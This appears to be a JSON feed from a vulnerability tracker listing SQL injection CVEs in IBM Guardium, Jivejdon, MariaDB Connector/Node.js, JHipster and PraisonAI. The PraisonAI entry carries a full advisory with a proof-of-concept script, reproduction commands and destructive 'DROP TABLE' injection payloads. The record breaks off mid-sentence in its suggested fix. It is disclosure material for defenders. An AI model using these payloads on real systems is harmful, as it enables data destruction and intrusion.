{"success":true,"data":{"threats":[{"id":"dcda3691-6c27-4913-a73e-2c3039eae015","slug":"cve-2026-84209","externalId":"CVE-2026-84209","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-84209 — IBM Guardium Data Protection 12.2.2, and 12.1 could allow a remote attacker to execute arbitrary SQL commands due to improper neutralization of spe…","description":"IBM Guardium Data Protection 12.2.2, and 12.1 could allow a remote attacker to execute arbitrary SQL commands due to improper neutralization of special elements used in an SQL command.","cveId":"CVE-2026-84209","cvssScore":8.1,"cvssVector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","severity":"high","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-89"],"tags":["nvd","status:received"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://www.ibm.com/support/pages/node/7288832","type":"advisory","title":"psirt@us.ibm.com"}],"epssScore":null,"epssPercentile":null,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-08T22:17:33.583Z","addedAt":"2026-10-08T23:06:40.579Z","updatedAt":"2026-10-08T23:06:40.579Z","epssUpdatedAt":null,"nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-84209","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-84209","note":"authoritative record"}]},{"id":"452b47d3-5455-4046-9bd5-33086b569ec1","slug":"cve-2026-81932","externalId":"CVE-2026-81932","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-81932 — IBM Guardium Data Protection 12.0, 12.1, and 12.2 is vulnerable to SQL injection.","description":"IBM Guardium Data Protection 12.0, 12.1, and 12.2 is vulnerable to SQL injection. A remote unauthenticated attacker could send specially crafted SQL statements, which could allow the attacker to view, add, modify, or delete information in the back-end database.","cveId":"CVE-2026-81932","cvssScore":8.6,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L","severity":"high","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-89"],"tags":["nvd","status:received"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://www.ibm.com/support/pages/node/7291674","type":"advisory","title":"psirt@us.ibm.com"}],"epssScore":null,"epssPercentile":null,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-08T22:17:32.493Z","addedAt":"2026-10-08T23:06:40.474Z","updatedAt":"2026-10-08T23:06:40.474Z","epssUpdatedAt":null,"nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-81932","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-81932","note":"authoritative record"}]},{"id":"faac6cb9-bbc1-4ba2-930e-f24fb270da1f","slug":"cve-2026-80381","externalId":"CVE-2026-80381","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-80381 — IBM Guardium Data Protection 12.0, 12.1, and 12.2 could allow a remote attacker to execute unauthorized SQL statements due to SQL injection.","description":"IBM Guardium Data Protection 12.0, 12.1, and 12.2 could allow a remote attacker to execute unauthorized SQL statements due to SQL injection.","cveId":"CVE-2026-80381","cvssScore":9.8,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","severity":"critical","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-89"],"tags":["nvd","status:received"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://www.ibm.com/support/pages/node/7291674","type":"advisory","title":"psirt@us.ibm.com"}],"epssScore":null,"epssPercentile":null,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-08T22:17:32.353Z","addedAt":"2026-10-08T23:06:40.458Z","updatedAt":"2026-10-08T23:06:40.458Z","epssUpdatedAt":null,"nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-80381","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-80381","note":"authoritative record"}]},{"id":"bbdcc75c-0b22-4953-9a83-74506cc4d77b","slug":"cve-2025-71428","externalId":"CVE-2025-71428","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2025-71428 — Jivejdon through 5.0 contains a sql injection vulnerability in AccountDaoSql.getAccountByNameLike() that allows authenticated administrators to inj…","description":"Jivejdon through 5.0 contains a sql injection vulnerability in AccountDaoSql.getAccountByNameLike() that allows authenticated administrators to inject SQL via the username parameter. Attackers with the Admin role can submit crafted input to /admin/user/userListAction to read database contents, including other accounts' password hashes.","cveId":"CVE-2025-71428","cvssScore":6.9,"cvssVector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","severity":"medium","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-89"],"tags":["nvd","status:received"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://github.com/banq/jivejdon","type":"advisory","title":"disclosure@vulncheck.com"},{"url":"https://github.com/banq/jivejdon/blob/ee67a65e65228644a71c8317d7e34deea50f95ef/src/main/java/com/jdon/jivejdon/infrastructure/repository/dao/sql/AccountDaoSql.java#L329-L335","type":"advisory","title":"disclosure@vulncheck.com"},{"url":"https://github.com/banq/jivejdon/blob/ee67a65e65228644a71c8317d7e34deea50f95ef/src/main/java/com/jdon/jivejdon/presentation/action/admin/UserListAction.java#L13-L24","type":"advisory","title":"disclosure@vulncheck.com"},{"url":"https://github.com/banq/jivejdon/issues/24","type":"advisory","title":"disclosure@vulncheck.com"},{"url":"https://github.com/banq/jivejdon/issues/28","type":"advisory","title":"disclosure@vulncheck.com"},{"url":"https://www.vulncheck.com/advisories/jivejdon-through-5.0-sql-injection-via-username-in-userlistaction","type":"advisory","title":"disclosure@vulncheck.com"}],"epssScore":null,"epssPercentile":null,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-08T22:17:26.033Z","addedAt":"2026-10-08T23:06:39.954Z","updatedAt":"2026-10-08T23:06:39.954Z","epssUpdatedAt":null,"nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2025-71428","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2025-71428","note":"authoritative record"}]},{"id":"6587f6ec-8901-4ca6-9452-8d174906f986","slug":"cve-2026-16830","externalId":"CVE-2026-16830","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-16830 — IBM Security Verify Access 10.0 through 10.0.9.2 and IBM Verify Identity Access 11.0 through 11.0.3 could allow a remote authenticated attacker to …","description":"IBM Security Verify Access 10.0 through 10.0.9.2 and IBM Verify Identity Access 11.0 through 11.0.3 could allow a remote authenticated attacker to modify data and cause a denial of service due to an SQL injection vulnerability.","cveId":"CVE-2026-16830","cvssScore":5.4,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L","severity":"medium","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-89"],"tags":["nvd","status:awaiting-analysis"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://www.ibm.com/support/pages/node/7291628","type":"advisory","title":"psirt@us.ibm.com"}],"epssScore":null,"epssPercentile":null,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-08T21:17:56.370Z","addedAt":"2026-10-08T23:06:39.686Z","updatedAt":"2026-10-08T23:06:39.686Z","epssUpdatedAt":null,"nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-16830","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-16830","note":"authoritative record"}]},{"id":"f46d72ca-29ef-48d8-baca-994a00dd2546","slug":"cve-2026-107385","externalId":"CVE-2026-107385","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-107385 — MariaDB Connector/Node.js is used to connect applications developed on Node.js to MariaDB and MySQL databases.","description":"MariaDB Connector/Node.js is used to connect applications developed on Node.js to MariaDB and MySQL databases. Prior to 3.2.5, 3.3.4, 3.4.7, and 3.5.4, text-protocol escaping always prefixes quotes with a backslash and does not honor the session's NO_BACKSLASH_ESCAPES mode, including in Connection.escape(). When that mode is enabled, the backslash is an ordinary character, so an attacker-controlled placeholder value can close the SQL string literal and inject arbitrary SQL with the application's database privileges. The vulnerable configuration may be enabled server-wide, through connector initialization options, or with an application-issued SET sql_mode; execute() and batch() use binary protocols and are not affected. This issue is fixed in versions 3.2.5, 3.3.4, 3.4.7, and 3.5.4.","cveId":"CVE-2026-107385","cvssScore":7.4,"cvssVector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H","severity":"high","vendor":"npm","product":"mariadb","affectedVersions":["pkg:npm/mariadb < 3.2.5","pkg:npm/mariadb >= 3.3.0, < 3.3.4","pkg:npm/mariadb >= 3.4.0, < 3.4.7","pkg:npm/mariadb >= 3.5.0-rc.0, < 3.5.4"],"cwes":["CWE-89"],"tags":["nvd","status:received","status:awaiting-analysis","osv","osv:ghsa-r3rv-jm3r-62q2","ecosystem:npm"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://github.com/mariadb-corporation/mariadb-connector-nodejs/commit/6995c8cf8e51b2ad055de63dcaa4094eebbef5ce","type":"other","title":"OSV web"},{"url":"https://github.com/mariadb-corporation/mariadb-connector-nodejs/commit/7670d90949307e735c0ae148d80b3776478a599d","type":"other","title":"OSV web"},{"url":"https://github.com/mariadb-corporation/mariadb-connector-nodejs/commit/95886df9fa0cca991e2be339caa6c3979be61553","type":"other","title":"OSV web"},{"url":"https://github.com/mariadb-corporation/mariadb-connector-nodejs/commit/e5a9d732d9574177749488336319b73074072779","type":"other","title":"OSV web"},{"url":"https://github.com/mariadb-corporation/mariadb-connector-nodejs/releases/tag/3.2.5","type":"other","title":"OSV web"},{"url":"https://github.com/mariadb-corporation/mariadb-connector-nodejs/releases/tag/3.3.4","type":"other","title":"OSV web"},{"url":"https://github.com/mariadb-corporation/mariadb-connector-nodejs/releases/tag/3.4.7","type":"other","title":"OSV web"},{"url":"https://github.com/mariadb-corporation/mariadb-connector-nodejs/releases/tag/3.5.4","type":"other","title":"OSV web"},{"url":"https://github.com/mariadb-corporation/mariadb-connector-nodejs/security/advisories/GHSA-r3rv-jm3r-62q2","type":"other","title":"OSV web"},{"url":"https://hackerone.com/reports/3889197","type":"other","title":"OSV web"},{"url":"https://jira.mariadb.org/browse/CONJS-368","type":"other","title":"OSV web"},{"url":"https://osv.dev/vulnerability/GHSA-r3rv-jm3r-62q2","type":"advisory","title":"OSV GHSA-r3rv-jm3r-62q2"},{"url":"https://github.com/mariadb-corporation/mariadb-connector-nodejs","type":"vendor","title":"OSV package"}],"epssScore":null,"epssPercentile":null,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-08T19:17:01.170Z","addedAt":"2026-10-08T19:33:16.972Z","updatedAt":"2026-10-08T21:08:30.672Z","epssUpdatedAt":null,"nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-107385","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-107385","note":"authoritative record"},{"label":"OSV","url":"https://osv.dev/vulnerability/GHSA-R3RV-JM3R-62Q2"}]},{"id":"aa26568f-1f21-419c-a95a-c3cd2d47466d","slug":"cve-2026-107384","externalId":"CVE-2026-107384","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-107384 — MariaDB Connector/Node.js is used to connect applications developed on Node.js to MariaDB and MySQL databases.","description":"MariaDB Connector/Node.js is used to connect applications developed on Node.js to MariaDB and MySQL databases. From 3.2.0 until 3.2.5, 3.3.4, 3.4.7, and 3.5.4, applications that enable permitSetMultiParamEntries can pass objects whose keys are expanded into a SQL SET clause without being processed by escapeId. An attacker-controlled key containing a backtick can close the quoted identifier and cause the remainder of the key to be interpreted as SQL. This can update columns the application did not intend to expose and can append arbitrary SQL with the database user's privileges. The option is disabled by default, and serialized-object handling used when it is disabled is not affected. This issue is fixed in versions 3.2.5, 3.3.4, 3.4.7, and 3.5.4.","cveId":"CVE-2026-107384","cvssScore":8.1,"cvssVector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","severity":"high","vendor":"npm","product":"mariadb","affectedVersions":["pkg:npm/mariadb >= 3.2.0, < 3.2.5","pkg:npm/mariadb >= 3.3.0, < 3.3.4","pkg:npm/mariadb >= 3.4.0, < 3.4.7","pkg:npm/mariadb >= 3.5.0-rc.0, < 3.5.4"],"cwes":["CWE-89"],"tags":["nvd","status:received","status:awaiting-analysis","osv","osv:ghsa-v6pj-gxxw-phfw","ecosystem:npm"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://github.com/mariadb-corporation/mariadb-connector-nodejs/commit/144b8f4ef29539a9fb4b75d972b9dcdac4088b4e","type":"other","title":"OSV web"},{"url":"https://github.com/mariadb-corporation/mariadb-connector-nodejs/commit/6743b2f4a89b074268b44c650170767f35e1fb5d","type":"other","title":"OSV web"},{"url":"https://github.com/mariadb-corporation/mariadb-connector-nodejs/commit/8eb450972ff0f3826d7d45c071a42240798bc826","type":"other","title":"OSV web"},{"url":"https://github.com/mariadb-corporation/mariadb-connector-nodejs/commit/b9b04ec82a60b2caf2b0c038259ca9aff5d7014a","type":"other","title":"OSV web"},{"url":"https://github.com/mariadb-corporation/mariadb-connector-nodejs/releases/tag/3.2.5","type":"other","title":"OSV web"},{"url":"https://github.com/mariadb-corporation/mariadb-connector-nodejs/releases/tag/3.3.4","type":"other","title":"OSV web"},{"url":"https://github.com/mariadb-corporation/mariadb-connector-nodejs/releases/tag/3.4.7","type":"other","title":"OSV web"},{"url":"https://github.com/mariadb-corporation/mariadb-connector-nodejs/releases/tag/3.5.4","type":"other","title":"OSV web"},{"url":"https://github.com/mariadb-corporation/mariadb-connector-nodejs/security/advisories/GHSA-v6pj-gxxw-phfw","type":"other","title":"OSV web"},{"url":"https://hackerone.com/reports/3889198","type":"other","title":"OSV web"},{"url":"https://jira.mariadb.org/browse/CONJS-369","type":"other","title":"OSV web"},{"url":"https://osv.dev/vulnerability/GHSA-v6pj-gxxw-phfw","type":"advisory","title":"OSV GHSA-v6pj-gxxw-phfw"},{"url":"https://github.com/mariadb-corporation/mariadb-connector-nodejs","type":"vendor","title":"OSV package"}],"epssScore":null,"epssPercentile":null,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-08T19:17:00.990Z","addedAt":"2026-10-08T19:33:16.960Z","updatedAt":"2026-10-08T21:08:30.618Z","epssUpdatedAt":null,"nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-107384","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-107384","note":"authoritative record"},{"label":"OSV","url":"https://osv.dev/vulnerability/GHSA-V6PJ-GXXW-PHFW"}]},{"id":"419355fc-3322-47ea-a552-30b27c35b5b0","slug":"cve-2026-107375","externalId":"CVE-2026-107375","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-107375 — JHipster is a development platform to quickly generate, develop, and deploy modern web applications and microservice architectures.","description":"JHipster is a development platform to quickly generate, develop, and deploy modern web applications and microservice architectures. From 7.0.0 until 9.4.0, reactive applications generated with Spring WebFlux, Spring Data R2DBC, and a SQL database pass the attacker-controlled sort request parameter from paginated entity-list endpoints into createOrderByFields in generators/spring-boot/generators/data-relational/templates/src/main/java/package/repository/EntityManager_reactive.java.ejs. The generated code renders these properties into the SQL ORDER BY clause without validation or quoting, and the R2DBC simple query protocol can execute additional statements separated by semicolons. A normal authenticated user can consequently read sensitive tables, modify or delete data, or drop tables, while non-reactive JPA applications and NoSQL backends are outside this root cause. This issue is fixed in 9.4.0.","cveId":"CVE-2026-107375","cvssScore":8.8,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","severity":"high","vendor":"npm","product":"generator-jhipster","affectedVersions":["pkg:npm/generator-jhipster >= 7.0.0, < 9.4.0"],"cwes":["CWE-89"],"tags":["nvd","status:received","osv","osv:ghsa-r223-96jv-q533","ecosystem:npm","status:awaiting-analysis"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://github.com/jhipster/generator-jhipster/commit/f6f1579581da8db0d1b8bd28dd473b56951c83af","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/jhipster/generator-jhipster/releases/tag/v9.4.0","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/jhipster/generator-jhipster/security/advisories/GHSA-r223-96jv-q533","type":"advisory","title":"security-advisories@github.com"},{"url":"https://osv.dev/vulnerability/GHSA-r223-96jv-q533","type":"advisory","title":"OSV GHSA-r223-96jv-q533"},{"url":"https://github.com/jhipster/generator-jhipster","type":"vendor","title":"OSV package"}],"epssScore":null,"epssPercentile":null,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-08T18:17:21.883Z","addedAt":"2026-10-08T18:39:31.882Z","updatedAt":"2026-10-08T23:06:38.786Z","epssUpdatedAt":null,"nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-107375","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-107375","note":"authoritative record"},{"label":"OSV","url":"https://osv.dev/vulnerability/GHSA-R223-96JV-Q533"}]},{"id":"a66c6588-92e5-49ff-a8b2-001c89454014","slug":"cve-2026-60090","externalId":"GHSA-wf65-4jjx-q444","source":"OSV","sourceType":"ghsa","type":"vulnerability","title":"PraisonAI: PGVector and Cassandra knowledge stores interpolate vector dimensions into DDL","description":"# PGVector and Cassandra knowledge stores interpolate vector dimensions into DDL\n\n## Summary\n\nThe PGVector and Cassandra knowledge-store backends validate SQL/CQL identifiers such as schema, keyspace, and collection names, but still insert the caller-controlled `dimension` argument directly into `CREATE TABLE` vector column declarations. A caller that can influence collection creation dimensions can append SQL/CQL tokens to the generated DDL executed by the database driver.\n\n## Technical Details\n\nThe affected boundary is the vector-store collection creation API. The shared `KnowledgeStore.create_collection()` contract declares `dimension: int`, but Python type hints are not enforced at runtime. Backends that interpolate that value into DDL must validate the runtime value before constructing SQL/CQL.\n\n`src/praisonai/praisonai/persistence/knowledge/pgvector.py` already treats DDL identifier interpolation as security-sensitive: `__init__()` calls `validate_identifier(schema, name=\"schema\")`, and `_table_name()` calls `validate_identifier(collection, name=\"collection name\")` before returning `f\"{self.schema}.praison_vec_{collection}\"`. However, `PGVectorKnowledgeStore.create_collection()` then executes:\n\n```python\ncur.execute(f\"\"\"\n    CREATE TABLE IF NOT EXISTS {table} (\n        id VARCHAR(255) PRIMARY KEY,\n        content TEXT,\n        content_hash VARCHAR(64),\n        created_at DOUBLE PRECISION,\n        metadata JSONB,\n        embedding vector({dimension})\n    )\n\"\"\")\n```\n\nNo equivalent type or range check runs on `dimension`. Passing a string such as `3); DROP TABLE tenant_secrets; --` reaches the SQL sent to `cur.execute()`.\n\n`src/praisonai/praisonai/persistence/knowledge/cassandra.py` has the same pattern. The constructor validates `keyspace`, and `create_collection()` validates the collection name, but the vector column DDL uses:\n\n```python\nself._session.execute(f\"\"\"\n    CREATE TABLE IF NOT EXISTS {name} (\n        id text PRIMARY KEY,\n        content text,\n        content_hash text,\n        created_at double,\n        embedding vector<float, {dimension}>\n    )\n\"\"\")\n```\n\nPassing a string such as `3>; DROP TABLE tenant_secrets; --` reaches the CQL sent to `session.execute()`.\n\n## PoV\n\nThis minimal PoV imports the real backend classes with fake database drivers, records the statements sent to the drivers, and compares a safe integer dimension with a malicious string dimension. It also attempts a malicious collection name as a negative control; current code rejects that name, proving the identifier hardening is active while the vector dimension remains unguarded.\n\n```python\n#!/usr/bin/env python3\n\"\"\"Local PoV for vector-store dimension DDL interpolation.\n\nThe script imports PraisonAI's current source with fake PostgreSQL/Cassandra\ndrivers, then records the SQL/CQL sent to the driver cursors. No database server\nis required; the assertion is that the real classes build executable DDL with an\nattacker-controlled dimension string.\n\"\"\"\n\nfrom __future__ import annotations\n\nimport argparse\nimport importlib\nimport json\nimport subprocess\nimport sys\nimport types\nfrom pathlib import Path\nfrom typing import Any\n\n\nclass SqlRecorder:\n    def __init__(self) -> None:\n        self.statements: list[dict[str, Any]] = []\n\n    def execute(self, statement: str, params: Any = None) -> None:\n        normalized = \"\\n\".join(line.rstrip() for line in statement.strip().splitlines())\n        self.statements.append({\"statement\": normalized, \"params\": params})\n\n    def __enter__(self) -> \"SqlRecorder\":\n        return self\n\n    def __exit__(self, *_exc: object) -> None:\n        return None\n\n\nclass FakeConnection:\n    def __init__(self, recorder: SqlRecorder) -> None:\n        self.recorder = recorder\n\n    def cursor(self, *args: Any, **kwargs: Any) -> SqlRecorder:\n        return self.recorder\n\n    def commit(self) -> None:\n        return None\n\n\nclass FakePool:\n    def __init__(self, recorder: SqlRecorder) -> None:\n        self.conn = FakeConnection(recorder)\n\n    def getconn(self) -> FakeConnection:\n        return self.conn\n\n    def putconn(self, _conn: FakeConnection) -> None:\n        return None\n\n    def closeall(self) -> None:\n        return None\n\n\nclass FakeCassandraSession:\n    def __init__(self, recorder: SqlRecorder) -> None:\n        self.recorder = recorder\n        self.keyspace: str | None = None\n\n    def execute(self, statement: str, params: Any = None) -> list[Any]:\n        self.recorder.execute(statement, params)\n        return []\n\n    def set_keyspace(self, keyspace: str) -> None:\n        self.keyspace = keyspace\n\n\nclass FakeCluster:\n    recorder: SqlRecorder\n\n    def __init__(self, *_args: Any, **_kwargs: Any) -> None:\n        self.session = FakeCassandraSession(self.recorder)\n\n    def connect(self) -> FakeCassandraSession:\n        return self.session\n\n    def shutdown(self) -> None:\n        return None\n\n\ndef install_fake_pg_driver(recorder: SqlRecorder) -> None:\n    psycopg2 = types.ModuleType(\"psycopg2\")\n    pool = types.ModuleType(\"psycopg2.pool\")\n    extras = types.ModuleType(\"psycopg2.extras\")\n\n    pool.ThreadedConnectionPool = lambda *_args, **_kwargs: FakePool(recorder)  # type: ignore[attr-defined]\n    extras.RealDictCursor = object  # type: ignore[attr-defined]\n    psycopg2.pool = pool  # type: ignore[attr-defined]\n    psycopg2.extras = extras  # type: ignore[attr-defined]\n\n    sys.modules[\"psycopg2\"] = psycopg2\n    sys.modules[\"psycopg2.pool\"] = pool\n    sys.modules[\"psycopg2.extras\"] = extras\n\n\ndef install_fake_cassandra_driver(recorder: SqlRecorder) -> None:\n    cassandra = types.ModuleType(\"cassandra\")\n    cluster = types.ModuleType(\"cassandra.cluster\")\n    auth = types.ModuleType(\"cassandra.auth\")\n\n    FakeCluster.recorder = recorder\n    cluster.Cluster = FakeCluster  # type: ignore[attr-defined]\n    auth.PlainTextAuthProvider = lambda *_args, **_kwargs: object()  # type: ignore[attr-defined]\n\n    sys.modules[\"cassandra\"] = cassandra\n    sys.modules[\"cassandra.cluster\"] = cluster\n    sys.modules[\"cassandra.auth\"] = auth\n\n\ndef git_value(source_root: Path, *args: str) -> str:\n    return subprocess.check_output([\"git\", *args], cwd=source_root, text=True).strip()\n\n\ndef try_invalid_collection(store: Any) -> str:\n    try:\n        store.create_collection(\"docs; DROP TABLE blocked; --\", 3)\n    except Exception as exc:  # noqa: BLE001 - output records exact guard behavior.\n        return f\"{type(exc).__name__}: {exc}\"\n    return \"accepted\"\n\n\ndef run_pgvector(source_root: Path) -> dict[str, Any]:\n    recorder = SqlRecorder()\n    install_fake_pg_driver(recorder)\n    sys.path.insert(0, str(source_root / \"src\" / \"praisonai\"))\n    mod = importlib.import_module(\"praisonai.persistence.knowledge.pgvector\")\n    store = mod.PGVectorKnowledgeStore(url=\"postgresql://example.invalid/db\", auto_create_extension=False)\n\n    invalid_collection = try_invalid_collection(store)\n    recorder.statements.clear()\n    store.create_collection(\"docs\", 3)\n    safe_statements = list(recorder.statements)\n\n    recorder.statements.clear()\n    payload = \"3); DROP TABLE tenant_secrets; --\"\n    store.create_collection(\"docs\", payload)\n    malicious_statements = list(recorder.statements)\n\n    return {\n        \"payload\": payload,\n        \"invalid_collection_control\": invalid_collection,\n        \"safe_contains_drop_table\": \"DROP TABLE\" in json.dumps(safe_statements),\n        \"malicious_contains_drop_table\": \"DROP TABLE tenant_secrets\" in json.dumps(malicious_statements),\n        \"safe_statements\": safe_statements,\n        \"malicious_statements\": malicious_statements,\n    }\n\n\ndef run_cassandra(source_root: Path) -> dict[str, Any]:\n    recorder = SqlRecorder()\n    install_fake_cassandra_driver(recorder)\n    sys.path.insert(0, str(source_root / \"src\" / \"praisonai\"))\n    mod = importlib.import_module(\"praisonai.persistence.knowledge.cassandra\")\n    store = mod.CassandraKnowledgeStore(hosts=[\"127.0.0.1\"], keyspace=\"praisonai_safe\")\n\n    invalid_collection = try_invalid_collection(store)\n    recorder.statements.clear()\n    store.create_collection(\"docs\", 3)\n    safe_statements = list(recorder.statements)\n\n    recorder.statements.clear()\n    payload = \"3>; DROP TABLE tenant_secrets; --\"\n    store.create_collection(\"docs\", payload)\n    malicious_statements = list(recorder.statements)\n\n    return {\n        \"payload\": payload,\n        \"invalid_collection_control\": invalid_collection,\n        \"safe_contains_drop_table\": \"DROP TABLE\" in json.dumps(safe_statements),\n        \"malicious_contains_drop_table\": \"DROP TABLE tenant_secrets\" in json.dumps(malicious_statements),\n        \"safe_statements\": safe_statements,\n        \"malicious_statements\": malicious_statements,\n    }\n\n\ndef main() -> None:\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\"--source-root\", type=Path, default=Path.cwd())\n    args = parser.parse_args()\n    source_root = args.source_root.resolve()\n\n    output = {\n        \"source\": {\n            \"repository\": \"MervinPraison/PraisonAI\",\n            \"head\": git_value(source_root, \"rev-parse\", \"HEAD\"),\n            \"describe\": git_value(source_root, \"describe\", \"--tags\", \"--always\", \"--dirty\"),\n        },\n        \"pgvector\": run_pgvector(source_root),\n        \"cassandra\": run_cassandra(source_root),\n    }\n\n    assert output[\"pgvector\"][\"invalid_collection_control\"].startswith(\"ValueError:\"), output\n    assert output[\"cassandra\"][\"invalid_collection_control\"].startswith(\"ValueError:\"), output\n    assert output[\"pgvector\"][\"safe_contains_drop_table\"] is False, output\n    assert output[\"cassandra\"][\"safe_contains_drop_table\"] is False, output\n    assert output[\"pgvector\"][\"malicious_contains_drop_table\"] is True, output\n    assert output[\"cassandra\"][\"malicious_contains_drop_table\"] is True, output\n\n    print(json.dumps(output, indent=2, sort_keys=True))\n\n\nif __name__ == \"__main__\":\n    main()\n```\n\n## PoC\n\nSave the PoV script above as `pov_vector_dimension_ddl_injection.py`, then reproduce against current head:\n\n```bash\ngit clone https://github.com/MervinPraison/PraisonAI.git\ncd PraisonAI\ngit checkout 3aa9cbc2bd49c23a32be0a89a5e620d13d843eab\npython3 pov_vector_dimension_ddl_injection.py --source-root .\n```\n\nDecisive PGVector output:\n\n```json\n{\n  \"pgvector\": {\n    \"invalid_collection_control\": \"ValueError: collection name must be non-empty and contain only alphanumerics and underscores\",\n    \"safe_contains_drop_table\": false,\n    \"malicious_contains_drop_table\": true,\n    \"malicious_statements\": [\n      {\n        \"statement\": \"CREATE TABLE IF NOT EXISTS public.praison_vec_docs (... embedding vector(3); DROP TABLE tenant_secrets; --) ...)\"\n      }\n    ]\n  }\n}\n```\n\nDecisive Cassandra output:\n\n```json\n{\n  \"cassandra\": {\n    \"invalid_collection_control\": \"ValueError: collection name must be non-empty and contain only alphanumerics and underscores\",\n    \"safe_contains_drop_table\": false,\n    \"malicious_contains_drop_table\": true,\n    \"malicious_statements\": [\n      {\n        \"statement\": \"CREATE TABLE IF NOT EXISTS docs (... embedding vector<float, 3>; DROP TABLE tenant_secrets; --> ...)\"\n      }\n    ]\n  }\n}\n```\n\nThe local controls also showed safe integer dimensions produce `embedding vector(3)` and `embedding vector<float, 3>` without `DROP TABLE`, while malicious collection names are rejected before driver execution.\n\n## Impact\n\nThis is a SQL/CQL injection sink in database DDL generation. Applications that expose RAG collection creation, tenant workspace provisioning, plugin-managed vector-store setup, or similar lower-trust configuration to PGVector or Cassandra knowledge stores can let a lower-privileged caller append database statements under the application database principal. Depending on database permissions, impact can include dropping, creating, or altering database objects. The conservative classification is CWE-89 for PGVector and CWE-943/CQL injection for Cassandra, with Medium severity because the attacker must influence the collection dimension and the application principal must have DDL privileges.\n\n## Suggested Fix\n\nValidate `dimension` before constructing DDL in every backend that uses it. Prefer a shared helper at the `KnowledgeStore.create_collection()` 